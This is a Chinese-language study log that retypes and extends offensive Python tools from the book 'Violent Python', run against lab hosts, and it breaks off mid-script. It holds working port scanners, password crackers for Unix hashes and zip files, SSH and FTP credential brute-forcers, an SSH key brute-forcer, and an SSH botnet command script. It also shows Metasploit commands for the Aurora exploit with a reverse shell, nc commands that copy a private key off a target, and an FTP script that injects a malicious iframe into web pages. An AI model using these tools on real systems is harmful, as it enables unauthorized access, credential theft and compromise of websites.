本篇文章主要把《Python绝技:运用Python成为顶级黑客》中的代码敲一遍,学学Python安全相关的编程与思路,然后根据具体的情况修改一下代码。
安装Python-nmap包:
wget http://xael.org/norman/python/python-nmap/pythonnmap-0.2.4.tar.gz-On map.tar.gz
tar -xzf nmap.tar.gz
cd python-nmap-0.2.4/
python setup.py install
当然可以使用easy_install模块实现更简便的安装:easy_install python-nmap
安装其他:easy_install pyPdf python-nmap pygeoip mechanize BeautifulSoup4
其他几个无法用easy_install命令安装的与蓝牙有关的库:apt-get install python-bluez bluetooth python-obexftp
简单地说,Python解释是通过调用Python解释器执行py脚本,而Python交互则是通过在命令行输入python实现交互。
Python中的字符串、整形数、列表、布尔值以及词典。
四个方法:upper()大写输出、lower()小写输出、replace()替换、find()查找
append()方法向列表添加元素、index()返回元素的索引、remove()删除元素、sort()排序、len()返回列表长度
keys()返回词典中所有键的列表、items()返回词典中所有项的完整信息的列表
使用socket模块,connect()方法建立与指定IP和端口的网络连接;recv(1024)方法将读取套接字中接下来的1024B数据
if 条件一:
语句一
elif 条件二:
语句二
else:
语句三
try/except语句进行异常处理,可以将异常存储到变量e中以便打印出来,同时还要调用str()将e转换成一个字符串
通过def()关键字定义,示例中定义扫描FTP banner信息的函数:
#!/usr/bin/python
#coding=utf-8
import socket
def retBanner(ip,port):
try:
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect((ip,port))
banner = s.recv(1024)
return banner
except:
return
def checkVulns(banner):
if 'vsFTPd' in banner:
print '[+] vsFTPd is vulnerable.'
elif 'FreeFloat Ftp Server' in banner:
print '[+] FreeFloat Ftp Server is vulnerable.'
else:
print '[-] FTP Server is not vulnerable.'
return
def main():
ips = ['10.10.10.128','10.10.10.160']
port = 21
banner1 = retBanner(ips[0],port)
if banner1:
print '[+] ' + ips[0] + ": " + banner1.strip('\n')
checkVulns(banner1)
banner2 = retBanner(ips[1],port)
if banner2:
print '[+] ' + ips[1] + ": " + banner2.strip('\n')
checkVulns(banner2)
if __name__ == '__main__':
main()
for语句
#!/usr/bin/python
#coding=utf-8
import socket
def retBanner(ip,port):
try:
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect((ip,port))
banner = s.recv(1024)
return banner
except:
return
def checkVulns(banner):
if 'vsFTPd' in banner:
print '[+] vsFTPd is vulnerable.'
elif 'FreeFloat Ftp Server' in banner:
print '[+] FreeFloat Ftp Server is vulnerable.'
else:
print '[-] FTP Server is not vulnerable.'
return
def main():
portList = [21,22,25,80,110,443]
ip = '10.10.10.128'
for port in portList:
banner = retBanner(ip,port)
if banner:
print '[+] ' + ip + ':' + str(port) + '--' + banner
if port == 21:
checkVulns(banner)
if __name__ == '__main__':
main()
open()打开文件,r只读,r+读写,w新建(会覆盖原有文件),a追加,b二进制文件
同一目录中:
不同目录中:
从当前目录开始往下查找,前面加上.号
或者是绝对路径则不用加.号表示从当前目录开始
sys.argv列表中含有所有的命令行参数,sys.argv[0]为Python脚本的名称,其余的都是命令行参数
os.path.isfile()检查该文件是否存在
os.access()判断当前用户是否有权限读取该文件
#!/usr/bin/python
#coding=utf-8
import sys
import os
if len(sys.argv) == 2:
filename = sys.argv[1]
if not os.path.isfile(filename):
print '[-] ' + filename + ' does not exit.'
exit(0)
if not os.access(filename,os.R_OK):
print '[-] ' + filename + ' access denied.'
exit(0)
print '[+] Reading From: ' + filename
将上述各个模块整合起来,实现对目标主机的端口及其banner信息的扫描:
#!/usr/bin/python
#coding=utf-8
import socket
import sys
import os
def retBanner(ip,port):
try:
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect((ip,port))
banner = s.recv(1024)
return banner
except:
return
def checkVulns(banner,filename):
f = open(filename, 'r')
for line in f.readlines():
if line.strip('\n') in banner:
print '[+] Server is vulnerable: ' + banner.strip('\n')
def main():
if len(sys.argv) == 2:
filename = sys.argv[1]
if not os.path.isfile(filename):
print '[-] ' + filename + ' does not exit.'
exit(0)
if not os.access(filename,os.R_OK):
print '[-] ' + filename + ' access denied.'
exit(0)
print '[+] Reading From: ' + filename
else:
print '[-] Usage: ' + str(sys.argv[0]) + ' '
exit(0)
portList = [21,22,25,80,110,443]
ip = '10.10.10.128'
for port in portList:
banner = retBanner(ip,port)
if banner:
print '[+] ' + ip + ':' + str(port) + '--' + banner
if port == 21:
checkVulns(banner,filename)
if __name__ == '__main__':
main()
运行结果:
这段代码通过分别读取两个文件,一个为加密口令文件,另一个为用于猜测的字典文件。在testPass()函数中读取字典文件,并通过crypt.crypt()进行加密,其中需要一个明文密码以及两个字节的盐,然后再用加密后的信息和加密口令进行比较查看是否相等即可。
先看crypt的示例:
可以看到盐是添加在密文的前两位的,所以将加密口令的前两位提取出来为salt即可。
#!/usr/bin/python
#coding=utf-8
import crypt
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('dictionary.txt','r')
for word in dictFile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word,salt)
if cryptWord == cryptPass:
print '[+] Found Password: ' + word + "\n"
return
print '[-] Password not Found.\n'
return
def main():
passFile = open('passwords.txt')
for line in passFile.readlines():
if ":" in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print '[*] Cracking Password For : ' + user
testPass(cryptPass)
if __name__ == '__main__':
main()
运行结果:
在现代的类Unix系统中在/etc/shadow文件中存储了口令的hash,但是更多的是使用SHA-512等更安全的hash算法,如:
在Python中的hashlib库可以找到SHA-512的函数,这样就可以进一步升级脚本进行口令破解。
主要使用zipfile库的extractall()方法,其中pwd参数指定密码
#!/usr/bin/python
#coding=utf-8
import zipfile
import optparse
from threading import Thread
def extractFile(zFile,password):
try:
zFile.extractall(pwd=password)
print '[+] Fonud Password : ' + password + '\n'
except:
pass
def main():
parser = optparse.OptionParser("[*] Usage: ./unzip.py -f -d ")
parser.add_option('-f',dest='zname',type='string',help='specify zip file')
parser.add_option('-d',dest='dname',type='string',help='specify dictionary file')
(options,args) = parser.parse_args()
if (options.zname == None) | (options.dname == None):
print parser.usage
exit(0)
zFile = zipfile.ZipFile(options.zname)
passFile = open(options.dname)
for line in passFile.readlines():
line = line.strip('\n')
t = Thread(target=extractFile,args=(zFile,line))
t.start()
if __name__ == '__main__':
main()
代码中导入了optparse库解析命令行参数,调用OptionParser()生成一个参数解析器类的示例,parser.add_option()指定具体解析哪些命令行参数,usage输出的是参数的帮助信息;同时也采用了多线程的方式提高破解速率。
运行结果:
#!/usr/bin/python
#coding=utf-8
import optparse
import socket
from socket import *
def connScan(tgtHost,tgtPort):
try:
connSkt = socket(AF_INET,SOCK_STREAM)
connSkt.connect((tgtHost,tgtPort))
connSkt.send('ViolentPython\r\n')
result = connSkt.recv(100)
print '[+] %d/tcp open'%tgtPort
print '[+] ' + str(result)
connSkt.close()
except:
print '[-] %d/tcp closed'%tgtPort
def portScan(tgtHost,tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
print "[-] Cannot resolve '%s' : Unknown host"%tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP)
print '\n[+] Scan Results for: ' + tgtName[0]
except:
print '\n[+] Scan Results for: ' + tgtIP
setdefaulttimeout(1)
for tgtPort in tgtPorts:
print 'Scanning port' + tgtPort
connScan(tgtHost,int(tgtPort))
def main():
parser = optparse.OptionParser("[*] Usage : ./portscanner.py -H -p ")
parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')
parser.add_option('-p',dest='tgtPort',type='string',help='specify target port[s]')
(options,args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
portScan(tgtHost,tgtPorts)
if __name__ == '__main__':
main()
这段代码实现了命令行参数输入,需要用户输入主机IP和扫描的端口号,其中多个端口号之间可以用,号分割开;若参数输入不为空时(注意检测端口参数列表不为空即检测至少存在第一个值不为空即可)则调用函数进行端口扫描;在portScan()函数中先尝试调用gethostbyname()来从主机名获取IP,若获取不了则解析IP失败程序结束,若成功则继续尝试调用gethostbyaddr()从IP获取主机名相关信息,若获取成功则输出列表的第一项主机名否则直接输出IP,接着遍历端口调用connScan()函数进行端口扫描;在connScan()函数中,socket方法中有两个参数AF_INET和SOCK_STREAM,分别表示使用IPv4地址和TCP流,这两个参数是默认的,在上一章的代码中没有添加但是默认是这两个参数,其余的代码和之前的差不多了。
注意一个小问题就是,设置命令行参数的时候,是已经默认添加了-h和--help参数来提示参数信息的,如果在host参数使用-h的话就会出现错误,因而要改为用大写的H即书上的“-H”即可。
运行结果:
将上一小节的代码修改一下,添加线程实现,同时为了让一个函数获得完整的屏幕控制权,这里使用一个信号量semaphore,它能够阻止其他线程运行而避免出现多线程同时输出造成的乱码和失序等情况。在打印输出前带调用screenLock.acquire()函数执行一个加锁操作,若信号量还没被锁定则线程有权继续运行并输出打印到屏幕上,若信号量被锁定则只能等待直到信号量被释放。
#!/usr/bin/python
#coding=utf-8
import optparse
import socket
from socket import *
from threading import *
#定义一个信号量
screenLock = Semaphore(value=1)
def connScan(tgtHost,tgtPort):
try:
connSkt = socket(AF_INET,SOCK_STREAM)
connSkt.connect((tgtHost,tgtPort))
connSkt.send('ViolentPython\r\n')
result = connSkt.recv(100)
#执行一个加锁操作
screenLock.acquire()
print '[+] %d/tcp open'%tgtPort
print '[+] ' + str(result)
except:
#执行一个加锁操作
screenLock.acquire()
print '[-] %d/tcp closed'%tgtPort
finally:
#执行释放锁的操作,同时将socket的连接在其后关闭
screenLock.release()
connSkt.close()
def portScan(tgtHost,tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
print "[-] Cannot resolve '%s' : Unknown host"%tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP)
print '\n[+] Scan Results for: ' + tgtName[0]
except:
print '\n[+] Scan Results for: ' + tgtIP
setdefaulttimeout(1)
for tgtPort in tgtPorts:
t = Thread(target=connScan,args=(tgtHost,int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser("[*] Usage : ./portscanner.py -H -p ")
parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')
parser.add_option('-p',dest='tgtPort',type='string',help='specify target port[s]')
(options,args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
portScan(tgtHost,tgtPorts)
if __name__ == '__main__':
main()
运行结果:
从结果可以看到,使用多线程之后端口的扫描并不是按输入的顺序进行的了,而是同时进行,但是因为有信号量实现加锁等操作所以输出的结果并没有出现乱码等情况。
如果在前面没有下载该模块,则需要先到http://xael.org/pages/python-nmap-en.html中下载Python-Nmap
#!/usr/bin/python
#coding=utf-8
import nmap
import optparse
def nmapScan(tgtHost,tgtPort):
#创建一个PortScanner()类对象
nmScan = nmap.PortScanner()
#调用PortScanner类的scan()函数,将目标和端口作为参数输入并进行nmap扫描
nmScan.scan(tgtHost,tgtPort)
#输出扫描结果中的状态信息
state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
print '[*] ' + tgtHost + " tcp/" + tgtPort + " " + state
def main():
parser=optparse.OptionParser("[*] Usage : ./nmapScan.py -H -p ")
parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')
parser.add_option('-p',dest='tgtPorts',type='string',help='specify target port[s]')
(options,args)=parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPorts).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
for tgtPort in tgtPorts:
nmapScan(tgtHost,tgtPort)
if __name__ == '__main__':
main()
运行结果:
若在前面第一章的时候没有下载,则需要先下载Pexpect:https://pypi.python.org/pypi/pexpect/
Pexpect模块可以实现与程序交互、等待预期的屏幕输出并据此作出不同的响应。
先进行正常的ssh连接测试:
模仿这个流程,代码如下:
#!/usr/bin/python
#coding=utf-8
import pexpect
#SSH连接成功时的命令行交互窗口中前面的提示字符的集合
PROMPT = ['# ','>>> ','> ','\$ ']
def send_command(child,cmd):
#发送一条命令
child.sendline(cmd)
#期望有命令行提示字符出现
child.expect(PROMPT)
#将之前的内容都输出
print child.before
def connect(user,host,password):
#表示主机已使用一个新的公钥的消息
ssh_newkey = 'Are you sure you want to continue connecting'
connStr = 'ssh ' + user + '@' + host
#为ssh命令生成一个spawn类的对象
child = pexpect.spawn(connStr)
#期望有ssh_newkey字符、提示输入密码的字符出现,否则超时
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
#匹配到超时TIMEOUT
if ret == 0:
print '[-] Error Connecting'
return
#匹配到ssh_newkey
if ret == 1:
#发送yes回应ssh_newkey并期望提示输入密码的字符出现
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT,'[P|p]assword: '])
#匹配到超时TIMEOUT
if ret == 0:
print '[-] Error Connecting'
return
#发送密码
child.sendline(password)
child.expect(PROMPT)
return child
def main():
host='10.10.10.128'
user='msfadmin'
password='msfadmin'
child=connect(user,host,password)
send_command(child,'uname -a')
if __name__ == '__main__':
main()
这段代码没有进行命令行参数的输入以及没有实现命令行交互。
运行结果:
书上提到了BackTrack中的运行,也来测试一下吧:
在BT5中生成ssh-key并启动SSH服务:
sshd-generate
service ssh start
./sshScan.py
【个人修改的代码】
这段代码可以进一步改进一下,下面的是个人改进的代码,实现了参数化输入以及命令行shell交互的形式:
#!/usr/bin/python
#coding=utf-8
import pexpect
from optparse import OptionParser
#SSH连接成功时的命令行交互窗口中的提示符的集合
PROMPT = ['# ','>>> ','> ','\$ ']
def send_command(child,cmd):
#发送一条命令
child.sendline(cmd)
#期望有命令行提示字符出现
child.expect(PROMPT)
#将之前的内容都输出
print child.before.split('\n')[1]
def connect(user,host,password):
#表示主机已使用一个新的公钥的消息
ssh_newkey = 'Are you sure you want to continue connecting'
connStr = 'ssh ' + user + '@' + host
#为ssh命令生成一个spawn类的对象
child = pexpect.spawn(connStr)
#期望有ssh_newkey字符、提示输入密码的字符出现,否则超时
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
#匹配到超时TIMEOUT
if ret == 0:
print '[-] Error Connecting'
return
#匹配到ssh_newkey
if ret == 1:
#发送yes回应ssh_newkey并期望提示输入密码的字符出现
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
#匹配到超时TIMEOUT
if ret == 0:
print '[-] Error Connecting'
return
#发送密码
child.sendline(password)
child.expect(PROMPT)
return child
def main():
parser = OptionParser("[*] Usage : ./sshCommand2.py -H -u -p ")
parser.add_option('-H',dest='host',type='string',help='specify target host')
parser.add_option('-u',dest='username',type='string',help='target username')
parser.add_option('-p',dest='password',type='string',help='target password')
(options,args) = parser.parse_args()
if (options.host == None) | (options.username == None) | (options.password == None):
print parser.usage
exit(0)
child=connect(options.username,options.host,options.password)
while True:
command = raw_input(' ')
send_command(child,command)
if __name__ == '__main__':
main()
这样就可以指定目标主机进行SSH连接并实现了SSH一样的命令行交互体验了:
pxssh 是 pexpect 中 spawn 类的子类,增加了login()、logout()和prompt()几个方法,使用其可以轻松实现 ssh 连接,而不用自己调用相对复杂的 pexpect 的方法来实现。
prompt(self,timeout=20)方法用于匹配新提示符
使用pxssh替代上一小节的脚本:
#!/usr/bin/python
#coding=utf-8
from pexpect import pxssh
def send_command(s,cmd):
s.sendline(cmd)
#匹配prompt(提示符)
s.prompt()
#将prompt前所有内容打印出
print s.before
def connect(host,user,password):
try:
s = pxssh.pxssh()
#利用pxssh类的login()方法进行ssh登录
s.login(host,user,password)
return s
except:
print '[-] Error Connecting'
exit(0)
s = connect('10.10.10.128','msfadmin','msfadmin')
send_command(s,'uname -a')
一开始遇到一个问题,就是直接按书上的敲import pxssh会显示出错,但是明明已经安装了这个文件,查看资料发现是pxssh是在pexpect包中的,所以将其改为from pexpect import pxssh就可以了。
运行结果:
接着继续修改代码:
#!/usr/bin/python
#coding=utf-8
from pexpect import pxssh
import optparse
import time
from threading import *
maxConnections = 5
#定义一个有界信号量BoundedSemaphore,在调用release()函数时会检查增加的计数是否超过上限
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host,user,password,release):
global Found
global Fails
try:
s = pxssh.pxssh()
#利用pxssh类的login()方法进行ssh登录
s.login(host,user,password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
#SSH服务器可能被大量的连接刷爆,等待一会再连接
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
#递归调用的connect(),不可释放锁
connect(host,user,password,False)
#显示pxssh命令提示符提取困难,等待一会再连接
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
#递归调用的connect(),不可释放锁
connect(host,user,password,False)
finally:
if release:
#释放锁
connection_lock.release()
def main():
parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H -u -f ')
parser.add_option('-H',dest='host',type='string',help='specify target host')
parser.add_option('-u',dest='username',type='string',help='target username')
parser.add_option('-f',dest='file',type='string',help='specify password file')
(options,args) = parser.parse_args()
if (options.host == None) | (options.username == None) | (options.file == None):
print parser.usage
exit(0)
host = options.host
username = options.username
file = options.file
fn = open(file,'r')
for line in fn.readlines():
if Found:
print '[*] Exiting: Password Found'
exit(0)
if Fails > 5:
print '[!] Exiting: Too Many Socket Timeouts'
exit(0)
#加锁
connection_lock.acquire()
#去掉换行符,其中Windows为'\r\n',Linux为'\n'
password = line.strip('\r').strip('\n')
print '[-] Testing: ' + str(password)
#这里不是递归调用的connect(),可以释放锁
t = Thread(target=connect,args=(host,username,password,True))
child = t.start()
if __name__ =='__main__':
main()
Semaphore,是一种带计数的线程同步机制,当调用release时,增加计算,当acquire时,减少计数,当计数为0时,自动阻塞,等待release被调用。其存在两种Semaphore, 即Semaphore和BoundedSemaphore,都属于threading库。
Semaphore: 在调用release()函数时,不会检查增加的计数是否超过上限(没有上限,会一直上升)
BoundedSemaphore:在调用release()函数时,会检查增加的计数是否超过上限,从而保证了使用的计数
运行结果:
使用密钥登录ssh时,格式为:ssh user@host -i keyfile -o PasswordAuthentication=no
本来是要到这个网站中去下载ssh的私钥压缩包的:http://digitaloffense.net/tools/debianopenssl/
但是由于时间有点久已经没有该站点可以下载了。
为了进行测试就到靶机上将该ssh的rsa文件通过nc传过来:
Kali先开启nc监听:nc -lp 4444 > id_rsa
然后靶机Metasploitable进入ssh的dsa目录,将id_rsa文件而不是id_rsa.:
cd .ssh
nc -nv 10.10.10.160 4444 -q 1 < id_rsa
下面这段脚本主要是逐个使用指定目录中生成的密钥来尝试进行连接。
#!/usr/bin/python
#coding=utf-8
import pexpect
import optparse
import os
from threading import *
maxConnections = 5
#定义一个有界信号量BoundedSemaphore,在调用release()函数时会检查增加的计数是否超过上限
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(host,user,keyfile,release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + '@' + host + ' -i ' + keyfile + opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'$','#', ])
#匹配到ssh_newkey
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
#匹配到conn_closed
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
#匹配到提示符'$','#',
elif ret > 3:
print '[+] Success. ' + str(keyfile)
Stop = True
finally:
if release:
#释放锁
connection_lock.release()
def main():
parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H -u -d ')
parser.add_option('-H',dest='host',type='string',help='specify target host')
parser.add_option('-u',dest='username',type='string',help='target username')
parser.add_option('-d',dest='passDir',type='string',help='specify directory with keys')
(options,args) = parser.parse_args()
if (options.host == None) | (options.username == None) | (options.passDir == None):
print parser.usage
exit(0)
host = options.host
username = options.username
passDir = options.passDir
#os.listdir()返回指定目录下的所有文件和目录名
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
exit(0)
if Fails > 5:
print '[!] Exiting: Too Many Connections Closed By Remote Host.'
print '[!] Adjust number of simultaneous threads.'
exit(0)
#加锁
connection_lock.acquire()
#连接目录与文件名或目录
fullpath = os.path.join(passDir,filename)
print '[-] Testing keyfile ' + str(fullpath)
t = Thread(target=connect,args=(username,host,fullpath,True))
child = t.start()
if __name__ =='__main__':
main()
运行结果:
#!/usr/bin/python
#coding=utf-8
import optparse
from pexpect import pxssh
#定义一个客户端的类
class Client(object):
"""docstring for Client"""
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host,self.user,self.password)
return s
except Exception, e:
print e
print '[-] Error Connecting'
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print '[*] Output from ' + client.host
print '[+] ' + output + '\n'
def addClient(host, user, password):
client = Client(host,user,password)
botNet.append(client)
botNet = []
addClient('10.10.10.128','msfadmin','msfadmin')
addClient('10.10.10.153','root','toor')
botnetCommand('uname -a')
botnetCommand('whoami')
这段代码主要定义一个客户端的类实现ssh连接和发送命令,然后再定义一个botNet数组用于保存僵尸网络中的所有主机,并定义两个方法一个是添加僵尸主机的addClient()、 另一个为在僵尸主机中遍历执行命令的botnetCommand()。
运行结果:
【个人修改的代码】
接下来是本人修改的代码,先是将僵尸主机的信息都保存在一个文件中、以:号将三类信息分割开,从而脚本可以方便地通过读取文件中的僵尸主机信息,同时脚本也实现了批量命令行交互的形式,和之前修改的ssh命令行交互的形式差不多,只是每次输入一条命令所有的僵尸主机都会去执行从而返回命令结果:
botnet.txt文件:
botNet2.py:
#!/usr/bin/python
#coding=utf-8
import optparse
from pexpect import pxssh
import optparse
botNet=[]
#定义一个用于存放host的列表以便判断当前host之前是否已经添加进botNet中了
hosts = []
#定义一个客户端的类
class Client(object):
"""docstring for Client"""
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host,self.user,self.password)
return s
except Exception, e:
print e
print '[-] Error Connecting'
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnetCommand(cmd, k):
for client in botNet:
output=client.send_command(cmd)
#若k为True即最后一台主机发起请求后就输出,否则输出会和之前的重复
if k:
print '[*] Output from '+client.host
print '[+] '+output+'\n'
def addClient(host,user,password):
if len(hosts) == 0:
hosts.append(host)
client=Client(host,user,password)
botNet.append(client)
else:
t = True
#遍历查看host是否存在hosts列表中,若不存在则进行添加操作
for h in hosts:
if h == host:
t = False
if t:
hosts.append(host)
client=Client(host,user,password)
botNet.append(client)
def main():
parser=optparse.OptionParser('Usage : ./botNet.py -f ')
parser.add_option('-f',dest='file',type='string',help='specify botNet file')
(options,args)=parser.parse_args()
file = options.file
if file==None:
print parser.usage
exit(0)
#计算文件行数,不能和下面的f用同一个open()否则会出错
count = len(open(file,'r').readlines())
while True:
cmd=raw_input(" ")
k = 0
f = open(file,'r')
for line in f.readlines():
line = line.strip('\n')
host = line.split(':')[0]
user = line.split(':')[1]
password = line.split(':')[2]
k += 1
#这里需要判断是否到最后一台主机调用函数,因为命令的输出结果会把前面的所有结果都输出从而会出现重复输出的情况
if k < count:
addClient(host,user,password)
#不是最后一台主机请求,则先不输出命令结果
botnetCommand(cmd,False)
else:
addClient(host,user,password)
#最后一台主机请求,则可以输出命令结果
botnetCommand(cmd,True)
if __name__ =='__main__':
main()
这段修改的代码主要的处理问题是输出的问题,在代码注释中也说得差不多了,就这样吧。
运行结果:
用户可以将收集到的ssh僵尸主机都保存在botnet.txt文件中,这样脚本运行起来执行就会十分地方便、实现批量式的操作。
一些FTP服务器提供匿名登录的功能,因为这有助于网站访问软件更新,这种情况下,用户输入用户名“anonymous”并提交一个电子邮箱替代密码即可登录。
下面的代码主要是使用ftplib模块的FTP()、login()和quit()方法实现:
#!/usr/bin/python
#coding=utf-8
import ftplib
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','[email protected]')
print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
ftp.quit()
return True
except Exception, e:
print '\n[-] ' + str(h1) + ' FTP Anonymous Logon Failed.'
return False
hostname = '10.10.10.128'
anonLogin(hostname)
运行结果:
【个人修改的代码】
稍微修改了一下,实现命令行输入交互:
#!/usr/bin/python
#coding=utf-8
import ftplib
def anonLogin(hostname):
try:
ftp=ftplib.FTP(hostname)
ftp.login('anonymous','what')
print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.'
ftp.quit()
return True
except Exception,e:
print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
def main():
while True:
hostname = raw_input("Please enter the hostname: ")
anonLogin(hostname)
print
if __name__ == '__main__':
main()
运行结果:
同样是通过ftplib模块,结合读取含有密码的文件来实现FTP用户口令的破解:
#!/usr/bin/python
#coding=utf-8
import ftplib
def bruteLogin(hostname,passwdFile):
pF = open(passwdFile,'r')
for line in pF.readlines():
username = line.split(':')[0]
password = line.split(':')[1].strip('\r').strip('\n')
print '[+] Trying: ' + username + '/' + password
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print '\n[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password
ftp.quit()
return (username,password)
except Exception, e:
pass
print '\n[-] Could not brubrute force FTP credentials.'
return (None,None)
host = '10.10.10.128'
passwdFile = 'ftpBL.txt'
bruteLogin(host,passwdFile)
运行结果:
其中ftbBL.txt文件:
【个人修改的代码】
小改一下:
#!/usr/bin/python
import ftplib
def bruteLogin(hostname,passwdFile):
pF=open(passwdFile,'r')
for line in pF.readlines():
username=line.split(':')[0]
password=line.split(':')[1].strip('\r').strip('\n')
print '[+] Trying: '+username+"/"+password
try:
ftp=ftplib.FTP(hostname)
ftp.login(username,password)
print '\n[*] '+str(hostname)+' FTP Logon Succeeded: '+username+"/"+password
return (username,password)
except Exception,e:
pass
print '\n[-] Could not brute force FTP credentials.'
return (None,None)
def main():
while True:
h=raw_input("[*] Please enter the hostname: ")
f=raw_input("[*] Please enter the filename: ")
bruteLogin(h,f)
print
if __name__ == '__main__':
main()
运行结果:
有了FTP服务器的登录口令之后,可以进行测试该服务器是否提供Web服务,其中检测通过nlst()列出的每个文件的文件名是不是默认的Web页面文件名,并把找到的所有默认的网页都添加到retList数组中:
#!/usr/bin/python
#coding=utf-8
import ftplib
def returnDefault(ftp):
try:
#nlst()方法获取目录下的文件
dirList = ftp.nlst()
except:
dirList = []
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return
retList = []
for filename in dirList:
#lower()方法将文件名都转换为小写的形式
fn = filename.lower()
if '.php' in fn or '.asp' in fn or '.htm' in fn:
print '[+] Found default page: '+filename
retList.append(filename)
return retList
host = '10.10.10.130'
username = 'ftpuser'
password = 'ftppassword'
ftp = ftplib.FTP(host)
ftp.login(username,password)
returnDefault(ftp)
运行结果:
【个人修改的代码】
#!/usr/bin/python
#coding=utf-8
import ftplib
def returnDefault(ftp):
try:
#nlst()方法获取目录下的文件
dirList = ftp.nlst()
except:
dirList = []
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return
retList=[]
for fileName in dirList:
#lower()方法将文件名都转换为小写的形式
fn = fileName.lower()
if '.php' in fn or '.htm' in fn or '.asp' in fn:
print '[+] Found default page: ' + fileName
retList.append(fileName)
if len(retList) == 0:
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return retList
def main():
while True:
host = raw_input('[*]Host >>> ')
username = raw_input('[*]Username >>> ')
password = raw_input('[*]Password >>> ')
try:
ftp = ftplib.FTP(host)
ftp.login(username,password)
returnDefault(ftp)
except:
print '[-] Logon failed.'
print
if __name__ == '__main__':
main()
运行结果:
这里主要提及利用之前的极光漏洞,先在Kali中打开Metasploit框架窗口,然后输入命令:
search ms10_002_aurora
use exploit/windows/browser/ms10_002_aurora
show payloads
set payload windows/shell/reverse_tcp
show options
set SRVHOST 10.10.10.160
set URIPATH /exploit
set LHOST 10.10.10.160
set LPORT 443
exploit
运行之后,分别在win 2k3 server和XP上访问http://10.10.10.160:8080/exploit 站点,虽然得到了连接信息但是没有得到shell,可能是因为IE浏览器的版本不存在极光漏洞吧:
过程清晰之后,就实现往目标服务器的网站文件中注入访问http://10.10.10.160:8080/exploit的代码即可,整个代码如下:
#!/usr/bin/python
#coding=utf-8
import ftplib
def injectPage(ftp,page,redirect):
f = open(page + '.tmp','w')
#下载FTP文件
ftp.retrlines('RETR ' + page,f.write)
print '[+] Downloaded Page: ' + page
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: ' + page
#上传目标文件
ftp.storlines('STOR ' + page,open(page + '.tmp'))
print '[+] Uploaded Injected Page: ' + page
host = '10.10.10.130'
username = 'ftpuser'
password = 'ftppassword'
ftp = ftplib.FTP(host)
ftp.login(username,password)
redirect = ''
injectPage(ftp,'index.html',redirect)
运行结果:
显示下载页面、注入恶意代码、上传都成功,到服务器查看相应的文件内容,发现注入成功了:
接下来的利用和本小节开头的一样,直接打开msf进行相应的监听即可。
【个人修改的代码】
#!/usr/bin/python
#coding=utf-8
import ftplib
def injectPage(ftp,page,redirect):
f = open(page + '.tmp','w')
#下载FTP文件
ftp.retrlines('RETR ' + page,f.write)
print '[+] Downloaded Page: ' + page
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: ' + page
#上传目标文件
ftp.storlines('STOR ' + page,open(page + '.tmp'))
print '[+] Uploaded Injected Page: ' + page
print
def main():
while True:
host = raw_input('[*]Host >>> ')
